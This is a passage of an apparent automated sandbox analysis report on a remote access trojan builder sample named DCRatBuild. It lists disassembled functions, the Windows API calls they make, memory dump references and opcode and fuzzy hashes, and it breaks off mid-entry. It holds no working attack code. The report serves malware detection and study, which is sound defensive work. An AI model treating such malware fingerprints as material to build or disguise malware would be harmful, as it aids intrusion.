                                      • Instruction Fuzzy Hash: 09C0123205C608BFCB410BB0DC09D2FBBA8BBA6212F05C908F2B5C0060C238C010FB11
                                      Function 00F019A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: bc1e0071df3e2f1dfad6bdbfaf34d6e219b3a9033d12bd39d51e05f51c7a0f85
                                      • Instruction ID: 813cdc878813f1b2c7a8dea47d997a32a32aa666cd095c9d767775fd76256f6d
                                      • Opcode Fuzzy Hash: bc1e0071df3e2f1dfad6bdbfaf34d6e219b3a9033d12bd39d51e05f51c7a0f85
                                      • Instruction Fuzzy Hash: E3C19170E042549FEF15DF68C884BAA7BA5BF06324F0840B9DC459B2C6CB75D944FB61
                                      Function 00F03B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: b4b9474e2901b7fd7998d8e779e441540a500b0c405f0d25bb99389c45397969
                                      • Instruction ID: 612c4e61f722bae93b0db48c410454a4156b23eb8f309485cfd37e04a5abaef1
                                      • Opcode Fuzzy Hash: b4b9474e2901b7fd7998d8e779e441540a500b0c405f0d25bb99389c45397969
                                      • Instruction Fuzzy Hash: 0A710071501F489EDB21DB30CC41AEBB7ECAF14311F44492EE5AB87282DA356A48FF11
                                      Function 00F0837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F08384
                                        • Part of subcall function 00F01380: __EH_prolog.LIBCMT ref: 00F01385
                                        • Part of subcall function 00F01380: new.LIBCMT ref: 00F013FE
                                        • Part of subcall function 00F019A6: __EH_prolog.LIBCMT ref: 00F019AB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 70336de4095e6fe35abe3f67c6e72181196138e37963901738ee65589551f89c
                                      • Instruction ID: 01943e733edcabae839b56ba13f7e9c1f2a11511557410eca349811ab1bc0f47
                                      • Opcode Fuzzy Hash: 70336de4095e6fe35abe3f67c6e72181196138e37963901738ee65589551f89c
                                      • Instruction Fuzzy Hash: 2641B131D406549ADF20EB60CC55BEAB7A8AF50360F4440EAE58AA30D3DF795AC9FB50
                                      Function 00F01E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F01E05
                                        • Part of subcall function 00F03B3D: __EH_prolog.LIBCMT ref: 00F03B42
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: e88569a05e208ee701074a54cb27b4320c280d729b16ba8d5768d3f5d2bd113b
                                      • Instruction ID: c5282facfe1c52eca1da28d3382fe4bd1c46560269bbf4dcb63ae32a76d1d64b
                                      • Opcode Fuzzy Hash: e88569a05e208ee701074a54cb27b4320c280d729b16ba8d5768d3f5d2bd113b
                                      • Instruction Fuzzy Hash: B52168729041089FCB25EF98DD519EEFBF6BF48300F1001ADE845A7291CB366E10EB60
                                      Function 00F1A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F1A7C8
                                        • Part of subcall function 00F01380: __EH_prolog.LIBCMT ref: 00F01385
                                        • Part of subcall function 00F01380: new.LIBCMT ref: 00F013FE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 0588d998d02147a86aea5d1f9a29280b021816f3322bb8343c70d2a5083cd334
                                      • Instruction ID: f74b7991f8d24ee7e549cb7d21c3cb3b3115538cd2eb7f0613cebdd7d76d233c
                                      • Opcode Fuzzy Hash: 0588d998d02147a86aea5d1f9a29280b021816f3322bb8343c70d2a5083cd334
                                      • Instruction Fuzzy Hash: 5E214C71C052499ECF15DF94CD529EEBBB4FF19310F1004AEE809A7242DB396E46EB61
                                      Function 00F092E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: e7e84dbbbb7cdc7d222c3ca7344d6ec03f4424689bbe159eec546cc33c0d672b
                                      • Instruction ID: 12327d9d1d19a98bdc8160bd0cf36d1d4599aba4114fe1df4b4e312b878ea2f4
                                      • Opcode Fuzzy Hash: e7e84dbbbb7cdc7d222c3ca7344d6ec03f4424689bbe159eec546cc33c0d672b
                                      • Instruction Fuzzy Hash: 72118273E045289BCF22ABA8CC519DEB735AF48760F044215FC04A72D2DA789D10BAE0
                                      Function 00F0AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                      • Instruction ID: 78a596fa15366c7233aefefbbb85978eee0aaa5ebca485532ef0c297d08fda73
                                      • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                      • Instruction Fuzzy Hash: 21F08C31A10705DFDB30DA64C945756B7E8EB15330F208A1AE49AC66C0E778D880F742
                                      Function 00F05BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F05BDC
                                        • Part of subcall function 00F0B07D: __EH_prolog.LIBCMT ref: 00F0B082
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: e5bd353d67aed3676cb370a0c2f5cdef5adcfadc9ad95f0b5b618dbb0f061b2e
                                      • Instruction ID: 77e7884507e342c9a87c1e19f22a5c0b7bf4e61b3515e354db83740b01c38b20
                                      • Opcode Fuzzy Hash: e5bd353d67aed3676cb370a0c2f5cdef5adcfadc9ad95f0b5b618dbb0f061b2e
                                      • Instruction Fuzzy Hash: 60016D30A25684DAC725F7A4C8557DEFBA49F59700F40419EE85E532C3CBB81B09F662
                                      Function 00F28518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00F2C13D,00000000,?,00F267E2,?,00000008,?,00F289AD,?,?,?), ref: 00F2854A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      • Opcode ID: 648b3c06559afca9775f6eb0e5107168b553bb635034a96eac46e9f6de986fe9
                                      • Instruction ID: bb0192b2c3aeac068a15a0f679df078628cbd2d6e37db526a235c4be494e1177
                                      • Opcode Fuzzy Hash: 648b3c06559afca9775f6eb0e5107168b553bb635034a96eac46e9f6de986fe9
                                      • Instruction Fuzzy Hash: B8E0E5259432755BEB312A69BC02B9B3BCC9F417F0F1C0211EC14A6081CF28CC03B5E5
                                      Function 00F096D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00F0968F,?,?,?,?,00F31FA1,000000FF), ref: 00F096EB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotification
                                      • String ID:
                                      • API String ID: 2591292051-0
                                      • Opcode ID: 94909ec635ce23d74ced6bce8542877bbe9d2dc3acdc3da90358b2759f97ec10
                                      • Instruction ID: b281890a2545948b89c22f5608078e4ffbccb93b67471de796ad558735876175
                                      • Opcode Fuzzy Hash: 94909ec635ce23d74ced6bce8542877bbe9d2dc3acdc3da90358b2759f97ec10
                                      • Instruction Fuzzy Hash: 4BF0897195A7144FDB308A24D55879277E49B12735F044B1ED1FB434E1E7B5644DBF00
                                      Function 00F0A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00F0A4F5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: 146649ea542fa42ec939d374536060436b61d020b1c6f93053e5e71c9c6c3a49
                                      • Instruction ID: 06aafecae408ff42dc72d33bce14c00988063ef50d3fa40d3489f92778db9995
                                      • Opcode Fuzzy Hash: 146649ea542fa42ec939d374536060436b61d020b1c6f93053e5e71c9c6c3a49
                                      • Instruction Fuzzy Hash: DCF08935409790AACA229B784C047D77B95AF16371F04CA49F1FD121D5C2795495BB23
                                      Function 00F1067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 00F106B1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ExecutionStateThread
                                      • String ID:
                                      • API String ID: 2211380416-0
                                      • Opcode ID: 0d030f002ac01a2c0fbce1f1f60439f514da3cc9ca6b9a64e134177a014d7f98
                                      • Instruction ID: e936b0898db8972ba1a00814deb203b66db52e0a0f265495c4f9588377306159
                                      • Opcode Fuzzy Hash: 0d030f002ac01a2c0fbce1f1f60439f514da3cc9ca6b9a64e134177a014d7f98
                                      • Instruction Fuzzy Hash: 13D0C22460011069D6253324AC057FE3A064FC2730F080031FA0D935CB8E9A08DA72A2
                                      Function 00F19D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GdipAlloc.GDIPLUS(00000010), ref: 00F19D81
                                        • Part of subcall function 00F19B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F19B30
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                      • String ID:
                                      • API String ID: 1915507550-0
                                      • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction ID: 8333252a2eff5b209068f6a88884b71c7c420e13347f3be655c2ec65dd342cf2
                                      • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                      • Instruction Fuzzy Hash: 0CD0C731A5C20D7ADF41BB759C32AFA7BA9DB40350F104165BC48C6151EDB2DE90B6E1
                                      Function 00F09989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileType.KERNELBASE(000000FF,00F09887), ref: 00F09995
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileType
                                      • String ID:
                                      • API String ID: 3081899298-0
                                      • Opcode ID: 50abb1b16c75e078e4f8171fc5c6f1ffb207723e3d3bcc62d00078fa3ae473a5
                                      • Instruction ID: 9b36b27ccbf223e5f6b1f243cc45c6903b322d5e35abf16d14a62bb6c24145e6
                                      • Opcode Fuzzy Hash: 50abb1b16c75e078e4f8171fc5c6f1ffb207723e3d3bcc62d00078fa3ae473a5
                                      • Instruction Fuzzy Hash: ADD01271915140A5CF2587384D09099B752DB8337AB38C6A8D025C40E2E773C803F581
                                      Function 00F1D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00F1D43F
                                        • Part of subcall function 00F1AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1AC85
                                        • Part of subcall function 00F1AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1AC96
                                        • Part of subcall function 00F1AC74: IsDialogMessageW.USER32(00010414,?), ref: 00F1ACAA
                                        • Part of subcall function 00F1AC74: TranslateMessage.USER32(?), ref: 00F1ACB8
                                        • Part of subcall function 00F1AC74: DispatchMessageW.USER32(?), ref: 00F1ACC2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchItemPeekSendTranslate
                                      • String ID:
                                      • API String ID: 897784432-0
                                      • Opcode ID: b6b77a57742b137d2e0c55ae2e4f08f1610b8665a17d3d5adee7777418be91a7
                                      • Instruction ID: f5596d20c5a61fff0c455815558918621ab70dcd45dc23af098c05cff94217d4
                                      • Opcode Fuzzy Hash: b6b77a57742b137d2e0c55ae2e4f08f1610b8665a17d3d5adee7777418be91a7
                                      • Instruction Fuzzy Hash: 7ED09E31144300ABD6116B51CE06F0F7AA6BB99B04F004954B345740F286669D21BB16
                                      Function 00F1E1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1E20B
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7ae4062a08b7041579265b56f23866c5e91b855d3ee12fc9e3ebfa6b975fe484
                                      • Instruction ID: db6dfdf456023961388386aac6d199fd4c64c5cbb9bdf08d8a0471312d7cf8ca
                                      • Opcode Fuzzy Hash: 7ae4062a08b7041579265b56f23866c5e91b855d3ee12fc9e3ebfa6b975fe484
                                      • Instruction Fuzzy Hash: E4B012A366E0027C320C11047D26DB7032CC4C0B60330801AB605D408195428DC67433
                                      Function 00F1DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1DAB2
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
